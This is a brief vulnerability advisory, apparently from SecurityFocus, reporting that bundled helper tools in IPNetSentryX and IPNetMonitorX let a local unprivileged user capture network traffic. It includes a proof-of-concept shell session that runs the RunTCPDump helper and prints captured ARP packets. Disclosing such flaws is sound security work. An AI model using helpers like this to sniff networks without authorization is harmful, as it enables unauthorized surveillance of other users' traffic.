source: https://www.securityfocus.com/bid/8365/info

It has been reported that helper applications that are shipped with IPNetSentryX and IPNetMonitorX may be harnessed by a local attacker to provide for unauthorized network reconnaissance.

bash-2.05a$ id
uid=503(dummy) gid=20(staff) groups=20(staff)
bash-2.05a$ pwd
/Applications/IPNetSentryX.app/Contents/Resources
bash-2.05a$ ./RunTCPDump -i en1 -x -v -s 4096
RunTCPDump: listening on en1
18:02:55.726143 arp who-has 192.168.0.1 tell 192.168.0.1
0001 0800 0604 0001 XXXX XXXX XXXX XXXX
0001 0000 0000 0000 c0a8 0001 0000 0000
0000 0000 0000 0000 0000 0000 0000